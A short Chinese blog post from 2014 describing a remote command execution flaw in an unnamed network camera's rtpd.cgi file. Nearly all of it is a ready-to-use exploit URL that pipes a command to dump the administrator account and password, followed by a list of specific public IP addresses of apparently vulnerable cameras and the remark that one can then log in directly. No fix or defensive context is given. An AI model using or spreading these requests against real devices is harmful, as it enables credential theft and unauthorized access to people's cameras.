天气

某网络摄像头cgi文件存在远程命令执行漏洞


     某网络摄像头cgi文件存在远程命令执行漏洞/cgi-bin/xxxx.cgi 存在远程命令执行漏洞

获取网络摄像头账号密码,如下IP+cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

案例

http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

获取密码后,直接可登陆

多个IP受影响

http://101.78.142.10/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

http://218.253.245.125/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

http://113.255.93.243cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

标签:摄像头
分类:学习交流| 发布:admin| 查看: | 发表时间:2014/11/14
原创文章如转载,请注明:转载自个人资讯网 http://www.zhangxinran.com/
本文链接:http://www.zhangxinran.com/post/1130.html

相关文章

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Design By zhangxinran.com | Login | Power By zhangxinran.com | 皖公网安备:34010402701072号